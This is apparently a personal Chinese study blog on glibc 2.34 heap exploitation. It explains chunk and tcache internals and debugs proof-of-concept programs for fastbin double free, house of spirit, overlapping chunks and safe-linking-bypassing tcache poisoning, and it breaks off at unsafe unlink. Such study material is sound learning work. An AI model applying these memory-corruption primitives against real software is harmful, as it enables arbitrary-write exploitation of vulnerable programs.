pwn heap learning

怎么说呢，本来打算学习下pwn中的堆，然后就开始了，学到一半，感觉好像没啥用，因为感觉这些是不是实际情况中比较少，当然也可能是没遇到，然后我也不是为了ctf学习的，而且现在过头来，发现好多实际上都忘记了(感觉需要配套ctf题目进行练习)，还得重新看。。。后面如果实际用到在来看吧，与实际脱轨太多，就不在继续学了。

环境搭建

patchelf --set-interpreter /home/wuhao/tools/glibc-2.34/64/lib/ld-linux-x86-64.so.2 ./a.out

基础知识

malloc_chunk


struct malloc_chunk {
 INTERNAL_SIZE_T        mchunk_prev_size;  /* Size of previous chunk (if free).  */
 INTERNAL_SIZE_T        mchunk_size;       /* Size in bytes, including overhead. */
 
 struct malloc_chunk* fd;                /* double links -- used only if free. */
 struct malloc_chunk* bk;
 
 /* Only used for large blocks: pointer to next larger size.  */
 struct malloc_chunk* fd_nextsize;      /* double links -- used only if free. */
 struct malloc_chunk* bk_nextsize;
};
typedef struct malloc_chunk* mchunkptr;

一般来说，size_t 在 64 位中是 64 位无符号整数，32 位中是 32 位无符号整数。

prev_size, 如果该 chunk 的物理相邻的前一地址 chunk（两个指针的地址差值为前一 chunk 大小）是空闲的话，那该字段记录的是前一个 chunk 的大小 (包括 chunk 头)。否则，该字段可以用来存储物理相邻的前一个 chunk 的数据。这里的前一 chunk 指的是较低地址的 chunk 。
size ，该 chunk 的大小，大小必须是 2 * SIZE_SZ 的整数倍。如果申请的内存大小不是 2 * SIZE_SZ 的整数倍，会被转换满足大小的最小的 2 * SIZE_SZ 的倍数。32 位系统中，SIZE_SZ 是 4；64 位系统中，SIZE_SZ 是 8。该字段的低三个比特位对 chunk 的大小没有影响，它们从高到低分别表示
- NON_MAIN_ARENA，记录当前 chunk 是否不属于主线程，1 表示不属于，0 表示属于。
- IS_MAPPED，记录当前 chunk 是否是由 mmap 分配的。
- PREV_INUSE，记录前一个 chunk 块是否被分配。一般来说，堆中第一个被分配的内存块的 size 字段的 P 位都会被设置为 1，以便于防止访问前面的非法内存。当一个 chunk 的 size 的 P 位为 0 时，我们能通过 prev_size 字段来获取上一个 chunk 的大小以及地址。这也方便进行空闲 chunk 之间的合并。
fd，bk。 chunk 处于分配状态时，从 fd 字段开始是用户的数据。chunk 空闲时，会被添加到对应的空闲管理链表中，其字段的含义如下
- fd 指向下一个（非物理相邻）空闲的 chunk
- bk 指向上一个（非物理相邻）空闲的 chunk
- 通过 fd 和 bk 可以将空闲的 chunk 块加入到空闲的 chunk 块链表进行统一管理
fd_nextsize， bk_nextsize，也是只有 chunk 空闲的时候才使用，不过其用于较大的 chunk（large chunk）。
- fd_nextsize 指向前一个与当前 chunk 大小不同的第一个空闲块，不包含 bin 的头指针。
- bk_nextsize 指向后一个与当前 chunk 大小不同的第一个空闲块，不包含 bin 的头指针。
- 一般空闲的 large chunk 在 fd 的遍历顺序中，按照由大到小的顺序排列。这样做可以避免在寻找合适 chunk 时挨个遍历。

通过上面的介绍，我们也知道，malloc_是有两种状态的，use状态和free了的状态。

use状态。

free状态。

还有就是用到的一些宏，chunk 与 mem 指针头部的转换，也就是mchunkptr与指向userdate的指针的相互转换。


/* conversion from malloc headers to user pointers, and back */
#define chunk2mem(p) ((void *) ((char *) (p) + 2 * SIZE_SZ))
#define mem2chunk(mem) ((mchunkptr)((char *) (mem) -2 * SIZE_SZ))

bins

用户释放掉的 chunk 不会马上归还给系统，ptmalloc 会统一管理 heap 和 mmap 映射区域中的空闲的 chunk。当用户再一次请求分配内存时，ptmalloc 分配器会试图在空闲的 chunk 中挑选一块合适的给用户。这样可以避免频繁的系统调用，降低内存分配的开销。

在具体的实现中，ptmalloc 采用分箱式方法对空闲的 chunk 进行管理。首先，它会根据空闲的 chunk 的大小以及使用状态将 chunk 初步分为 4 类：fast bins，small bins，large bins，unsorted bin。每类中仍然有更细的划分，相似大小的 chunk 会用双向链表链接起来。也就是说，在每类 bin 的内部仍然会有多个互不相关的链表来保存不同大小的 chunk。

fastbins


typedef struct malloc_chunk* mchunkptr;
typedef struct malloc_chunk *mfastbinptr;
 
 
struct malloc_state
{ 
  ...
  /*other member*/
  ...
 
  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];
 
  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];
  ...
  /*other member*/
  ...
};

fastbinsY是一个指针数组，数组里面保存着指向malloc_chunk头的指针，数组大小为NFASTBINS=10，也就是有10条fastbin链，排序是按照每条链中chunk的size大小决定，数组的每个成员都是一条fastbin链，是单链表，需要注意的是fastbin则指向的是chunk head。

在tcachebin填满的情况下就会用到fastbin。

当free某个chunk到fastbin时，采用头插法，将chunk插入链表，fastbin的头结点指向新fd，chunk的fd存原来的fd。

fasbin链表为空时—>free了一个chunk1到fastbin链表

又free了一个chunk2到fastbin链表—>这时候在malloc一个，chunk2会从fastbin中拿出来重新使用。

tcache bin

####

small bin

小于1024字节（0x400）的chunk称之为small chunk，small bin就是用于管理small chunk的。

small bin采用FIFO(先入先出)算法，内存释放操作就将新释放的chunk添加到链表的front end(前端)，分配操作就从链表的rear end(尾端)中获取chunk。

fastbin_dup_glibc2.34

首先先去看基础知识中fastbin的free过程和重新从fastbin分配chunk的过程。

源码


#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
 
int main()
{
    setbuf(stdout, NULL);
 
    printf("This file demonstrates a simple double-free attack with fastbins.\n");
 
    printf("Fill up tcache first.\n");
    void *ptrs[8];
    for (int i=0; i<8; i++) {
        ptrs[i] = malloc(8);
    }
    for (int i=0; i<7; i++) {
        free(ptrs[i]);
    }
 
    printf("Allocating 3 buffers.\n");
    int *a = calloc(1, 8);
    int *b = calloc(1, 8);
    int *c = calloc(1, 8);
 
    printf("1st calloc(1, 8): %p\n", a);
    printf("2nd calloc(1, 8): %p\n", b);
    printf("3rd calloc(1, 8): %p\n", c);
 
    printf("Freeing the first one...\n");
    free(a);
 
    printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);
 
    printf("So, instead, we'll free %p.\n", b);
    free(b);
 
    printf("Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);
 
    printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
    a = calloc(1, 8);
    b = calloc(1, 8);
    c = calloc(1, 8);
    printf("1st calloc(1, 8): %p\n", a);
    printf("2nd calloc(1, 8): %p\n", b);
    printf("3rd calloc(1, 8): %p\n", c);
 
    assert(a == c);
}

简化后


#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
int main()
{
    setbuf(stdout, NULL);
    void *ptrs[8];
    for (int i=0; i<8; i++) {
        ptrs[i] = malloc(8);
    }
    for (int i=0; i<7; i++) {
        free(ptrs[i]);
    }
    int *a = calloc(1, 8);
    int *b = calloc(1, 8);
    int *c = calloc(1, 8);
    free(a);
    free(b);
    free(a);
    a = calloc(1, 8);
    b = calloc(1, 8);
    c = calloc(1, 8);
    assert(a == c);
}

原理

tcachebin填满的情况下，free的chunk会存到fastbin，fastbin是单向链表，采用头插法，只会用到fd指针，先进后出。

free过程中会对free的chunk的fd进行检查，看看是否和fastbin头的fd相等，也就是判断是否连续free了同一块堆区域。但是既然是根据fastbin头的fd来验证，我们就可以通过在中间在free另一个chunk一次的操作来绕过这种检测，造成double free同一块chunk。

并且如果我们再次申请空间又会从fastbin中分配chunk，这将会导致一些问题。

调试

基础知识中我们已经看了连续free chunk1，chunk2后的fastbin链表的样子，然后pwndbg调试结果如下。

这时候fastbin头的fd是指向chunk2的，所以我们可以继续在在其基础上free chunk1，得到如下的结果。

可以看到循环起来了。

这时候我们再次calloc一块内存，这时候由于fastbin头的fd指向chunk1，chunk1的fd指向chunk2，运行代码后fastbin头的fd就会指向chunk2了，chunk1就被分配了出来，但是这时候的chunk2的fd仍然指向chunk1。

注意的点是申请出的空间地址和fastbin上的地址是相差16byte的，这和malloc_chunk结构体有关，可以去看基础知识中的相关知识点。

再次申请一块内存，将地址给b，毫无疑问，肯定chunk2(b)这块内存就从fastbin中出来了，接下来fastbin头的fd将又指向chunk1。

再申请一段内存，我们又将申请到chunk1，所以a==c，这时候fastbin头的fd的值为某个值。

这时候的fd指向了某个值，然后实际上，如果我们能在第一次申请出的a，修改a-xx为我们想要修改的地址，也就是chunk1的fd，这时候的fd就会指向这块地址，我们就能达到操作这块地址的目的。

tcache house of spirit glibc2.34

先去看看基础知识中关于tcache bin的相关知识，还有malloc_chunk结构，可以对tcache bin的tcache_get()和tcache_put()函数有根深的理解。

原理

house of spirit的主要思想就是通过伪造chunk，再free掉fake_chunk使其进入tcache bin，再次malloc的时候就会将这个fake_chunk从tcache bin中申请出来。这样就可以写任意地址。

源码


#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
 
int main()
{
    setbuf(stdout, NULL);
 
    printf("This file demonstrates the house of spirit attack on tcache.\n");
    printf("It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n");
    printf("You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n");
    printf("(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");
 
    printf("Ok. Let's start with the example!.\n\n");
 
 
    printf("Calling malloc() once so that it sets up its memory.\n");
    malloc(1);
 
    printf("Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
    unsigned long long *a; //pointer that will be overwritten
    unsigned long long fake_chunks[10]; //fake chunk region
 
    printf("This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);
 
    printf("This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
    printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
    fake_chunks[1] = 0x40; // this is the size
 
 
    printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
    printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
 
    a = &fake_chunks[2];
 
    printf("Freeing the overwritten pointer.\n");
    free(a);
 
    printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
    void *b = malloc(0x30);
    printf("malloc(0x30): %p\n", b);
 
    assert((long)b == (long)&fake_chunks[2]);
}

简化版本下。


#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
int main()
{
    size_t fake_chunk[] = {0,0x40,0,0};
    size_t *p = &fake_chunk[2];
    free(p);
    size_t *b = malloc(0x30);
    assert(b == p);
}

调试

过程很简单，但想要深入了解tcache bin相关的代码处理，还得去源代码查看。

我们先是伪造了一个chunk，并且定义了一个p指针指向伪chunk的mem部分。

接下来进入free函数，我们s步入，调试其源码。

先是一个判断，判断传入的参数是否为0，为0就直接return，不过多阐述。


In file: /home/wuhao/tools/glibc-2.34/malloc/malloc.c
   3238 __libc_free (void *mem)
   3239 {
   3240   mstate ar_ptr;
   3241   mchunkptr p;                          /* chunk corresponding to mem */
   3242 
 ► 3243   if (mem == 0)                              /* free(0) has no effect */
   3244     return;
   3245 
   3246   /* Quickly check that the freed pointer matches the tag for the memory.
   3247      This gives a useful double-free detection.  */
   3248   if (__glibc_unlikely (mtag_enabled))

继续调试，调用mem2chunk，将传入的参数，获取指向伪chunk头的指针。


/* conversion from malloc headers to user pointers, and back */
#define chunk2mem(p) ((void *) ((char *) (p) + 2 * SIZE_SZ))
#define mem2chunk(mem) ((mchunkptr)((char *) (mem) -2 * SIZE_SZ))


pwndbg> p mem
$4 = (void *) 0x7fffffffdeb0
pwndbg> p p
$5 = (mchunkptr) 0x7fffffffdea0

然后会发现调用了MAYBE_INIT_TCACHE()这个宏，也就是tcache_init，如果tcache并且它为NULL，就进行初始化tcache，实际上调用malloc函数也调用了这个宏的。


# define MAYBE_INIT_TCACHE() \
  if (__glibc_unlikely (tcache == NULL)) \
    tcache_init();

#else  /* !USE_TCACHE */
# define MAYBE_INIT_TCACHE()

初始化的代码如下，主要是对tcache_perthread_struct结构体进行了初始化。


static void
tcache_init(void)
{
  mstate ar_ptr;
  void *victim = 0;
  const size_t bytes = sizeof (tcache_perthread_struct);

  if (tcache_shutting_down)
    return;

  arena_get (ar_ptr, bytes);
  victim = _int_malloc (ar_ptr, bytes);
  if (!victim && ar_ptr != NULL)
    {
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }


  if (ar_ptr != NULL)
    __libc_lock_unlock (ar_ptr->mutex);

  /* In a low memory situation, we may not be able to allocate memory
     - in which case, we just keep trying later.  However, we
     typically do this very early, so either there is sufficient
     memory, or there isn't enough memory to do non-trivial
     allocations anyway.  */
  if (victim)
    {
      tcache = (tcache_perthread_struct *) victim;
      memset (tcache, 0, sizeof (tcache_perthread_struct));
    }

}

继续单步调试，会进入_int_free函数，参数为ar_ptr，和p。

_int_free函数对应tcache处理的部分如下。


static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
  INTERNAL_SIZE_T size;        /* its size */
  mfastbinptr *fb;             /* associated fastbin */
  mchunkptr nextchunk;         /* next contiguous chunk */
  INTERNAL_SIZE_T nextsize;    /* its size */
  int nextinuse;               /* true if nextchunk is used */
  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
  mchunkptr bck;               /* misc temp for linking */
  mchunkptr fwd;               /* misc temp for linking */

  size = chunksize (p);

  /* Little security check which won't hurt performance: the
     allocator never wrapps around at the end of the address space.
     Therefore we can exclude some size values which might appear
     here by accident or by "design" from some intruder.  */
  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
      || __builtin_expect (misaligned_chunk (p), 0))
    malloc_printerr ("free(): invalid pointer");
  /* We know that each chunk is at least MINSIZE bytes in size or a
     multiple of MALLOC_ALIGNMENT.  */
  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
    malloc_printerr ("free(): invalid size");

  check_inuse_chunk(av, p);

#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);
    if (tcache != NULL && tc_idx < mp_.tcache_bins)
      {
	/* Check to see if it's already in the tcache.  */
	tcache_entry *e = (tcache_entry *) chunk2mem (p);

	/* This test succeeds on double free.  However, we don't 100%
	   trust it (it also matches random payload data at a 1 in
	   2^<size_t> chance), so verify it's not an unlikely
	   coincidence before aborting.  */
	if (__glibc_unlikely (e->key == tcache_key))
	  {
	    tcache_entry *tmp;
	    size_t cnt = 0;
	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
	    for (tmp = tcache->entries[tc_idx];
		 tmp;
		 tmp = REVEAL_PTR (tmp->next), ++cnt)
	      {
		if (cnt >= mp_.tcache_count)
		  malloc_printerr ("free(): too many chunks detected in tcache");
		if (__glibc_unlikely (!aligned_OK (tmp)))
		  malloc_printerr ("free(): unaligned chunk detected in tcache 2");
		if (tmp == e)
		  malloc_printerr ("free(): double free detected in tcache 2");
		/* If we get here, it was a coincidence.  We've wasted a
		   few cycles, but don't abort.  */
	      }
	  }

	if (tcache->counts[tc_idx] < mp_.tcache_count)
	  {
	    tcache_put (p, tc_idx);
	    return;
	  }
      }
  }
#endif

大概过程就是先chunksize(p)获取size，判断是否是tcache bin的范围，然后调用chunk2mem(p)转换为tcache_entry结构体指针e，然后判断e->key == tcache_key，根据注释来看这里是在检测double free，但是不能完全相信，所以又继续进入if内部，进行其他检测。检测完了之后就判断当前tcache bin链中chunk的个数是否小于mp_.tcache_count(7)，是就进入tcache_put，将free的chunk加入到这个tcache bin链中。

进入tcache_put()函数，其定义如下。


tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache_key;

  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

可以看到以头插的方式将chunk放到的合适size的tcache bin链中。

接下来调试malloc的函数。

进入tcache_get函数，其定义如下。


tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  if (__glibc_unlikely (!aligned_OK (e)))
    malloc_printerr ("malloc(): unaligned tcache chunk detected");
  tcache->entries[tc_idx] = REVEAL_PTR (e->next);
  --(tcache->counts[tc_idx]);
  e->key = 0;
  return (void *) e;
}

最后的b和p所以肯定就是一样的了。


In file: /home/wuhao/桌面/heap/heap1.c
    5 {
    6     size_t fake_chunk[] = {0,0x40,0,0};
    7     size_t *p = &fake_chunk[2];
    8     free(p);
    9     size_t *b = malloc(0x30);
 ► 10     assert(b == p);
   11 }
─────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────
00:0000│ rsp    0x7fffffffde90 —▸ 0x7fffffffdeb0 ◂— 0x7fffffffd
01:0008│        0x7fffffffde98 —▸ 0x7fffffffdeb0 ◂— 0x7fffffffd
02:0010│        0x7fffffffdea0 ◂— 0x0
03:0018│        0x7fffffffdea8 ◂— 0x40 /* '@' */
04:0020│ rax r9 0x7fffffffdeb0 ◂— 0x7fffffffd
05:0028│        0x7fffffffdeb8 ◂— 0x0
06:0030│        0x7fffffffdec0 ◂— 0xf
07:0038│        0x7fffffffdec8 ◂— 0x83f86fd3c7edfd00
───────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────
 ► f 0   0x55555555520a main+97
   f 1   0x7ffff7dfd808 __libc_start_call_main+109
   f 2   0x7ffff7dfd8c4 __libc_start_main_impl+141
───────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> p b
$14 = (size_t *) 0x7fffffffdeb0
pwndbg> p p
$15 = (size_t *) 0x7fffffffdeb0
pwndbg>

overlapping chunks glibc2.34

这一部分需要对malloc_chunk的结构比较熟悉。

原理

我们可以修改chunk的size部分，达到将两个或者多个chunk合并成一个chunk。如果两个chunk是连着的，我们去修改上面chunk_a的size，这样free处理第一个chunk的时候，会将其free到更大一点size的tcache bin 链中，这时候我们在malloc一个大一点size空间，就会从这个tcache bin中取出这个chunk_c，这时候的这个chunk空间实际上包括了原来下面chunk_c的空间的。

源码


/*
 A simple tale of overlapping chunk.
 This technique is taken from
 http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf
*/
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>
 
int main(int argc , char* argv[])
{
    setbuf(stdout, NULL);
 
    long *p1,*p2,*p3,*p4;
    printf("\nThis is another simple chunks overlapping problem\n");
    printf("The previous technique is killed by patch: https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c\n"
           "which ensures the next chunk of an unsortedbin must have prev_inuse bit unset\n"
           "and the prev_size of it must match the unsortedbin's size\n"
           "This new poc uses the same primitive as the previous one. Theoretically speaking, they are the same powerful.\n\n");
 
    printf("Let's start to allocate 4 chunks on the heap\n");
 
    p1 = malloc(0x80 - 8);
    p2 = malloc(0x500 - 8);
    p3 = malloc(0x80 - 8);
 
    printf("The 3 chunks have been allocated here:\np1=%p\np2=%p\np3=%p\n", p1, p2, p3);
 
    memset(p1, '1', 0x80 - 8);
    memset(p2, '2', 0x500 - 8);
    memset(p3, '3', 0x80 - 8);
 
    printf("Now let's simulate an overflow that can overwrite the size of the\nchunk freed p2.\n");
    int evil_chunk_size = 0x581;
    int evil_region_size = 0x580 - 8;
    printf("We are going to set the size of chunk p2 to to %d, which gives us\na region size of %d\n",
         evil_chunk_size, evil_region_size);
 
    /* VULNERABILITY */
    *(p2-1) = evil_chunk_size; // we are overwriting the "size" field of chunk p2
    /* VULNERABILITY */
 
    printf("\nNow let's free the chunk p2\n");
    free(p2);
    printf("The chunk p2 is now in the unsorted bin ready to serve possible\nnew malloc() of its size\n");
 
    printf("\nNow let's allocate another chunk with a size equal to the data\n"
           "size of the chunk p2 injected size\n");
    printf("This malloc will be served from the previously freed chunk that\n"
           "is parked in the unsorted bin which size has been modified by us\n");
    p4 = malloc(evil_region_size);
 
    printf("\np4 has been allocated at %p and ends at %p\n", (char *)p4, (char *)p4+evil_region_size);
    printf("p3 starts at %p and ends at %p\n", (char *)p3, (char *)p3+0x580-8);
    printf("p4 should overlap with p3, in this case p4 includes all p3.\n");
 
    printf("\nNow everything copied inside chunk p4 can overwrites data on\nchunk p3,"
           " and data written to chunk p3 can overwrite data\nstored in the p4 chunk.\n\n");
 
    printf("Let's run through an example. Right now, we have:\n");
    printf("p4 = %s\n", (char *)p4);
    printf("p3 = %s\n", (char *)p3);
 
    printf("\nIf we memset(p4, '4', %d), we have:\n", evil_region_size);
    memset(p4, '4', evil_region_size);
    printf("p4 = %s\n", (char *)p4);
    printf("p3 = %s\n", (char *)p3);
 
    printf("\nAnd if we then memset(p3, '3', 80), we have:\n");
    memset(p3, '3', 80);
    printf("p4 = %s\n", (char *)p4);
    printf("p3 = %s\n", (char *)p3);
 
    assert(strstr((char *)p4, (char *)p3));
}

简化后的源码。


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
int main(int argc , char* argv[])
{
    char *a = malloc(0x28);
    char *b = malloc(0x28);
    *(a-8) = 0x61;
    free(a);
    char *c = malloc(0x58);
    memset(c, 'c', 0x58);
    memset(b, 'b', 0x28);
    assert(strstr(c,b));
}

调试

先是申请两块内存。

修改完a-8后，即chunk_a的size改为0x61，实际上包含了标志位。chunk数量变了，size也变了。

所以说free(a)时，会以为chunk_a的大小为0x61，free到size为0x60的tcache bin链表中。


In file: /home/wuhao/桌面/heap/heap1.c
    6 {
    7     char *a = malloc(0x28);
    8     char *b = malloc(0x28);
    9     *(a-8) = 0x61;
   10     free(a);
 ► 11     char *c = malloc(0x58);
   12     memset(c, 'c', 0x58);
   13     memset(b, 'b', 0x28);
   14     assert(strstr(c,b));
   15 }
───────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdea0 —▸ 0x7fffffffdfe8 —▸ 0x7fffffffe346 ◂— 0x75772f656d6f682f ('/home/wu')
01:0008│     0x7fffffffdea8 ◂— 0x100000000
02:0010│     0x7fffffffdeb0 ◂— 0x0
03:0018│     0x7fffffffdeb8 —▸ 0x55555555a2a0 ◂— 0x55555555a
04:0020│     0x7fffffffdec0 —▸ 0x55555555a2d0 ◂— 0x0
05:0028│     0x7fffffffdec8 —▸ 0x7ffff7fe3c8f (__GI___tunables_init+445) ◂— mov    rbx, rax
06:0030│ rbp 0x7fffffffded0 —▸ 0x7fffffffdfe8 —▸ 0x7fffffffe346 ◂— 0x75772f656d6f682f ('/home/wu')
07:0038│     0x7fffffffded8 —▸ 0x7ffff7dfd808 (__libc_start_call_main+109) ◂— mov    edi, eax
─────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────
 ► f 0   0x55555555520f main+70
   f 1   0x7ffff7dfd808 __libc_start_call_main+109
   f 2   0x7ffff7dfd8c4 __libc_start_main_impl+141
────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> tcachebins
tcachebins
0x60 [  1]: 0x55555555a2a0 ◂— 0x0
pwndbg>

接下来使用malloc申请一段空间并返回值给c，由于我们申请的大小为0x58，就会从tcache bin中取出我们刚刚free掉的，所以实际上返回的地址为之前a的值。

这时候chunk_c的大小为0x58，但是实际上其内存空间是包含了原chunk_b的内存空间的，为了测试，我们采用赋值的方式，我们先将c内存空间赋值为c字符串(0x63)。

然后我们尝试修改b内存空间，可以看到c的内存空间也发生了变换。

tcache_poisoning_glibc2.34

之前在查看tcache bin链中的fd指针时，还很奇怪，为什么值不是下一个chunk的地址，在看了这部分知识后，得到了解答，其原因就是tcache_put()和tcache_get()两个函数是会对next指针进行一些处理的。

原理

就是伪造修改tcache bin链中某一chunk的next指针，只不过需要绕过PROTECT_PTR检测。

实际上感觉这是tcache house of spirit glibc2.34的进阶。

我们需要先知道next指针是什么设置的，之前我们也调试过关于tcache的源代码，知道是调用到了tcache_put()和tcache_get()两个函数的，在glibc2.32对next指针加入了一定的保护，也就是PROTECT_PTR函数。


/* Safe-Linking:
   Use randomness from ASLR (mmap_base) to protect single-linked lists
   of Fast-Bins and TCache.  That is, mask the "next" pointers of the
   lists' chunks, and also perform allocation alignment checks on them.
   This mechanism reduces the risk of pointer hijacking, as was done with
   Safe-Unlinking in the double-linked lists of Small-Bins.
   It assumes a minimum page size of 4096 bytes (12 bits).  Systems with
   larger pages provide less entropy, although the pointer mangling
   still works.  */
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

在正式进入样例前先调试一个小样例。


#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
int main()
{
    size_t *a = malloc(8);
    size_t *b = malloc(8);
    free(a);
    free(b);
    
    size_t *c = malloc(8);
    size_t *d = malloc(8);
    
    assert(a == d);
    assert(b == c);
    return 0;
}

主要还是去查看对next指针的处理。

进入第一个free，调试到tcache_put函数。

进入第二个free，调试到tcache_put函数。

e的地址实际上就是e->next的地址，经过调试发现，next指针指向的值=(当前e的地址>>12)^当前tcache bin链头的值。

所以这就是我们原来free后，为什么看内存时，感觉next的指针指向不对的原因。

接下来看重新malloc时，会对next指针进行什么处理。

进入第一个malloc函数，调试到tcache_get函数。

具体的操作就是获取当前tcache bin链头的fd值，然后调用REVEAL_PTR，实际上也是PROTECT_PTR函数，只不过传入的参数变了，具体可以看上面的定义。

tcache bin链头的fd值=(头地址>>12)^原tcache bin链头的fd值

所以实际上malloc就是free的逆运算，将tcache bin链头指向的chunk拿出去使用，然后继续指向下一个chunk。

所以tcache的next不是直接指向下一个结构体的，中间还添加了一个可逆的运算，我们也可以通过这可逆的特性，去构造一个伪next指针。

源码


#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>
 
int main()
{
    // disable buffering
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
 
    printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n"
           "returning a pointer to an arbitrary location (in this case, the stack).\n"
           "The attack is very similar to fastbin corruption attack.\n");
    printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n"
           "We have to create and free one more chunk for padding before fd pointer hijacking.\n\n");
    printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41,\n"
           "An heap address leak is needed to perform tcache poisoning.\n"
           "The same patch also ensures the chunk returned by tcache is properly aligned.\n\n");
 
    size_t stack_var[0x10];
    size_t *target = NULL;
 
    // choose a properly aligned target address
    for(int i=0; i<0x10; i++) {
        if(((long)&stack_var[i] & 0xf) == 0) {
            target = &stack_var[i];
            break;
        }
    }
    assert(target != NULL);
 
    printf("The address we want malloc() to return is %p.\n", target);
 
    printf("Allocating 2 buffers.\n");
    intptr_t *a = malloc(128);
    printf("malloc(128): %p\n", a);
    intptr_t *b = malloc(128);
    printf("malloc(128): %p\n", b);
 
    printf("Freeing the buffers...\n");
    free(a);
    free(b);
 
    printf("Now the tcache list has [ %p -> %p ].\n", b, a);
    printf("We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n"
           "to point to the location to control (%p).\n", sizeof(intptr_t), b, target);
    // VULNERABILITY
    // the following operation assumes the address of b is known, which requires a heap leak
    b[0] = (intptr_t)((long)target ^ (long)b >> 12);
    // VULNERABILITY
    printf("Now the tcache list has [ %p -> %p ].\n", b, target);
 
    printf("1st malloc(128): %p\n", malloc(128));
    printf("Now the tcache list has [ %p ].\n", target);
 
    intptr_t *c = malloc(128);
    printf("2nd malloc(128): %p\n", c);
    printf("We got the control\n");
 
    assert((long)target == (long)c);
    return 0;
}

简化版本


#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <string.h>
int main()
{
    size_t stack[0x10];
	memset(stack, 'a', 0x10);
    int i = 0;
    while ((long)&stack[i]&0xf) i++;
    size_t *target = &stack[i];
    size_t *a = malloc(8);
    size_t *b = malloc(8);
    free(a);
    free(b);
    b[0] = (size_t)((long)target ^ ((long)b >> 12));
    size_t * xx = malloc(8);
    size_t *c = malloc(8);
    assert( c == target);
    return 0;
}

调试

主要调试其如何构造的伪next指针，实际上就是伪造tcache_put里面的处理。

首先是malloc_chunk的size问题，必须满足一定的倍数关系，所以可以看到代码的前半部分在循环，就是保证地址最后一位是0。

然后就是构造部分了，chunk2的next应该指向chunk1(是经过运算才会得到真正的值)，我们的目的就是就是修改这个next的值。

正常的next的值的产生过程，在上面的小例子已经算过了。

b next指针指向的值=(当前b的地址>>12)^当前tcache bin链头的值(a chunk的地址)。

所以我们想伪造，就只需要将a chunk的地址改为合格target地址就可以了。

b[0] = (size_t)((long)target ^ ((long)b >> 12));

原来的tcache bin链和其对应内存如下。

执行b[0]=。。。后。

画了个图

然后想继续调试，可以进入第一个malloc内部，会发现经过REVEAL_PTR运算后，0x00007ffaaaaa8b1a变成了 0x7fffffffde40 。

>>> hex((0x55555555a2c0>>12)^0x00007ffaaaaa8b1a)
'0x7fffffffde40'
>>>

自然进行两次malloc后，申请到的地址就是我们构造的target了，就可以对target的内存进行修改。

unsafe_unlink_glibc2.34

原理

通过一系列构造，使其进入free中的unlink_chunk函数，利用里面的代码对地址进行修改。

具体需要调试，调试起来什么都明白了。

需要知道的几个点。

free时，如果范围不在fastbin的范围大小中，就会放入unsorted bin，放进去的时候检查物理相邻的前后chunk，如果是空闲的则unlink_chunk()函数合并后再放进去。
